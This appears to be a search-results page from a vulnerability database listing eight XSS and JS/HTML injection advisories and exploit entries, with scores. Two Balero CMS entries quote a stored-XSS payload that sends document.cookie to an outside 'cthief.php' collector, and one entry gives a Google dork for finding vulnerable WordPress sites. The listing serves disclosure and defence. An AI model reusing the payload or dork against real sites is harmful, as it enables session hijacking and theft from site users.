
8 matches found

Github Security Blog
added 2025/03/14 7:54 p.m., 14 views

JS Html Sanitizer allows XSS when used with contentEditable

Impact: XSS vulnerability when the sanitizer is used with a contentEditable element to set the element's innerHTML to a sanitized string produced by the package. If the code is particularly crafted to abuse the code beautifier, that runs AFTER sanitation. Patches: Patched in version 2.0.3...

CVSS 5.3, AI score 6.8, EPSS 0.00373
Exploits: 0, References: 4, Affected Software: 1
NVD
added 2023/01/26 9:18 p.m., 21 views

CVE-2023-22971

Cross Site Scripting XSS vulnerability in Hughes Network Systems Router Terminal for HX200 v8.3.1.14, HX90 v6.11.0.5, HX50L v6.10.0.18, HN9460 v8.2.0.48, and HN7000S v6.9.0.37, allows unauthenticated attackers to misuse frames, include JS/HTML code and steal sensitive information from legitimate...

CVSS 6.1, AI score 6.1, EPSS 0.00675
Exploits: 2, References: 2
Cvelist
added 2023/01/26 12:0 a.m., 20 views

CVE-2023-22971

Cross Site Scripting XSS vulnerability in Hughes Network Systems Router Terminal for HX200 v8.3.1.14, HX90 v6.11.0.5, HX50L v6.10.0.18, HN9460 v8.2.0.48, and HN7000S v6.9.0.37, allows unauthenticated attackers to misuse frames, include JS/HTML code and steal sensitive information from legitimate...

AI score 6.2, EPSS 0.00675
Exploits: 2, References: 2
0day.today
added 2015/06/25 12:0 a.m., 18 views

WordPress Huge-IT Slider 2.7.5 - Multiple Vulnerabilities

Exploit for php platform in category web applications Exploit Title: WordPress: wordpress huge-it-slider 2.7.5 & Persistent JS-HTML Code injection, Arbitrary slider deletion Date: 2015-06-23 Google Dork: intitle:"index of" intext:"/wp-content/plugins/slider-image/" Exploit Author: Joaquin Ramirez...

AI score 7.1
Exploits: 0
Patchstack
added 2015/06/24 12:0 a.m., 10 views

WordPress Huge IT Slider Plugin 2.7.5 - Multiple Vulnerabilities

There are multiple vulnerabilities in this plugin, such as cross-site request forgery and Persistent JS/HTML Injection. These vulnerabilities allow an attacker to make a user with access privileges to a page and inject JavaScript into the database. Solution Upgrade the plugin...

AI score 3.7
Exploits: 0, References: 1, Affected Software: 1
exploitpack
added 2015/04/08 12:0 a.m., 18 views

Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities

Balero CMS 0.7.2 - Multiple JSHTML Injection Vulnerabilities document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pent...

AI score 0.6
Exploits: 0
Packet Storm
added 2015/04/07 12:0 a.m., 30 views

Balero CMS 0.7.2 Cross Site Scripting

document.cookie="counter=1confirm'XSS'; path=/balerocms/"; csrf+stored xss+filter bypass+session hijack: document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;"...

AI score 7.4
Exploits: 0
Vulnerability Lab
added 2011/12/22 12:0 a.m., 19 views

Whois Cart Billing - Multiple Web Vulnerabilities

Document Title: Whois Cart Billing - Multiple Web Vulnerabilities. References (Source): http://www.vulnerability-lab.com/getcontent.php?id=343 Release Date: 2011-12-22. Vulnerability Laboratory ID (VL-ID): 343. Produ...

AI score 0.1
Exploits: 0